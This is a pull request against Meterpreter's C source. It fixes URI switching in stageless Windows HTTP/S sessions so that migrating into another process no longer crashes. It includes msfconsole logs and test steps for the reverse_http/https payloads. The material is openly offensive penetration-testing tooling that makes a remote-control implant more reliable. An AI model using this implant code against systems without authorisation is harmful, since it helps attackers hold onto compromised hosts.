### PR TITLE
Fix up URI switching for stageless

### DIFF
--- a/source/common/remote.h
+++ b/source/common/remote.h
@@ -68,6 +68,7 @@ typedef struct _HttpTransportContext
 	CSTRTYPE url;                         ///! Pointer to the URL stored with the transport.
 	STRTYPE ua;                           ///! User agent string.
 	STRTYPE uri;                          ///! UUID encoded as a URI.
+	STRTYPE new_uri;                      ///! New URI for stageless URI switches
 	STRTYPE proxy;                        ///! Proxy details.
 	STRTYPE proxy_user;                   ///! Proxy username.
 	STRTYPE proxy_pass;                   ///! Proxy password.

--- a/source/server/remote_dispatch_common.c
+++ b/source/server/remote_dispatch_common.c
@@ -67,18 +67,13 @@ BOOL request_core_patch_url(Remote* remote, Packet* packet, DWORD* result)
 	{
 		// This shouldn't happen.
 		*result = ERROR_INVALID_STATE;
-		return TRUE;
 	}
-
-	HttpTransportContext* ctx = (HttpTransportContext*)remote->transport->ctx;
-	SAFE_FREE(ctx->uri);
-
-	// yes, we are reusing the URL in this case
-	ctx->uri = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_URL);
-
-	dprintf("[DISPATCH] Recieved hot-patcheched URL for stageless: %S", ctx->uri);
-
-	*result = ERROR_SUCCESS;
+	else
+	{
+		HttpTransportContext* ctx = (HttpTransportContext*)remote->transport->ctx;
+		ctx->new_uri = packet_get_tlv_value_wstring(packet, TLV_TYPE_TRANS_URL);
+		*result = ERROR_SUCCESS;
+	}
 	return TRUE;
 }
 #endif

--- a/source/server/win/server_transport_winhttp.c
+++ b/source/server/win/server_transport_winhttp.c
@@ -718,7 +718,7 @@ static DWORD server_dispatch_http(Remote* remote, THREAD* dispatchThread)
 				dprintf("[DISPATCH] Old URL is: %S", transport->url);
 
 				// if the new URI needs more space, let's realloc space for the new URL now
-				int diff = wcslen(ctx->new_uri) - wcslen(ctx->uri);
+				int diff = (int)wcslen(ctx->new_uri) - (int)wcslen(ctx->uri);
 				if (diff > 0)
 				{
 					dprintf("[DISPATCH] New URI is bigger by %d", diff);

--- a/source/server/win/server_transport_winhttp.c
+++ b/source/server/win/server_transport_winhttp.c
@@ -644,6 +644,7 @@ static DWORD server_dispatch_http(Remote* remote, THREAD* dispatchThread)
 	DWORD ecount = 0;
 	DWORD delay = 0;
 	Transport* transport = remote->transport;
+	HttpTransportContext* ctx = (HttpTransportContext*)transport->ctx;
 
 	while (running)
 	{
@@ -697,18 +698,53 @@ static DWORD server_dispatch_http(Remote* remote, THREAD* dispatchThread)
 
 			dprintf("[DISPATCH] no pending packets, sleeping for %dms...", min(10000, delay));
 			Sleep(min(10000, delay));
-			continue;
 		}
+		else
+		{
+			transport->comms_last_packet = current_unix_timestamp();
 
-		transport->comms_last_packet = current_unix_timestamp();
+			// Reset the empty count when we receive a packet
+			ecount = 0;
 
-		// Reset the empty count when we receive a packet
-		ecount = 0;
+			dprintf("[DISPATCH] Returned result: %d", result);
 
-		dprintf("[DISPATCH] Returned result: %d", result);
+			running = command_handle(remote, packet);
+			dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
 
-		running = command_handle(remote, packet);
-		dprintf("[DISPATCH] command_process result: %s", (running ? "continue" : "stop"));
+			if (ctx->new_uri != NULL)
+			{
+				dprintf("[DISPATCH] Recieved hot-patched URL for stageless: %S", ctx->new_uri);
+				dprintf("[DISPATCH] Old URI is: %S", ctx->uri);
+				dprintf("[DISPATCH] Old URL is: %S", transport->url);
+
+				// if the new URI needs more space, let's realloc space for the new URL now
+				int diff = wcslen(ctx->new_uri) - wcslen(ctx->uri);
+				if (diff > 0)
+				{
+					dprintf("[DISPATCH] New URI is bigger by %d", diff);
+					transport->url = (wchar_t*)realloc(transport->url, (wcslen(transport->url) + diff + 1) * sizeof(wchar_t));
+				}
+
+				// we also need to patch the new URI into the original transport URL, not just the currently
+				// active URI for comms. If we don't, then migration behaves badly.
+				// Start by locating the start of the URI in the current URL, by finding the third slash
+				wchar_t* csr = transport->url + wcslen(transport->url) - 2;
+				while (*csr != L'/')
+				{
+					--csr;
+				}
+				dprintf("[DISPATCH] Pointer is at: %p -> %S", csr, csr);
+
+				// patch in the new URI
+				wcscpy_s(csr, wcslen(diff > 0 ? ctx->new_uri : ctx->uri) + 1, ctx->new_uri);
+				dprintf("[DISPATCH] New URL is: %S", transport->url);
+
+				// clean up
+				SAFE_FREE(ctx->uri);
+				ctx->uri = ctx->new_uri;
+				ctx->new_uri = NULL;
+			}
+		}
 	}
 
 	return result;


### PR DESCRIPTION
Stageless Windows HTTP/S Meterpreter sessions were failing to migrate because the internal implementation of URI switching was only updating the current URI that was in use for the HTTP/S comms, and not updating the transport configuration that was being maintained behind the scenes. This meant that stageless sessions would create a transport configuration block for migration that was invalid, and the result was nasty crashes.

This PR contains code that changes this behaviour so that it doesn't crash. It:

* Moves the URI copying outside of the dispatch loop. This means that the response to the URI switch goes back down the same channel as the one it was requested on.
* Modifies the transport's configuration block to include the new URI so that migration configuration stubs are generated correctly.

## Verification
### Pre-patch
Without this patch, this is what would happen on migrate:
```
meterpreter > migrate 552
[*] Migrating from 3420 to 552...

[*] 10.1.10.35:49182 (UUID: a48d3799ae791c89/x86=1/windows=1/2015-06-27T08:20:40Z) Redirecting stageless connection ...
[*] 10.1.10.35:49183 (UUID: a48d3799ae791c89/x86=1/windows=1/2015-06-27T08:20:40Z) Attaching orphaned/stageless session ...
[*] Meterpreter session 4 opened (10.1.10.40:8443 -> 10.1.10.35:49183) at 2015-06-27 19:03:48 +1000

[-] Error running command migrate: Rex::RuntimeError No response was received to the core_enumextcmd request.
meterpreter > 
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 10.1.10.35 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > [-] Failed to load extension: No response was received to the core_loadlib request.
```
As you can see, rather messy. You can see that MSF thinks it's a new session coming back in when it's not, and things get very out of whack.

The crash on Windows was horrible too.
### Post-patch
And with this PR implemented, we get:
```
meterpreter > migrate 348
[*] Migrating from 2024 to 348...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer        : WIN-S45GUQ5KGVK
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/win64
meterpreter > exit
```

### Steps
For each of `windows/meterpreter_reverse_http`, `windows/meterpreter_reverse_https`, `windows/x64/meterpreter_reverse_http` and `windows/x64/meterpreter_reverse_https`:

- [x] Create a payload (stageless obviously).
- [x] Set up the appropriate listener.
- [x] Establish a session.
- [x] Migrate to another process.
- [x] Confirm that this doesn't crash any more.

Sorry for the failures! @hmoore-r7 and @bcook-r7 I'd appreciate your eyes over this. Thanks!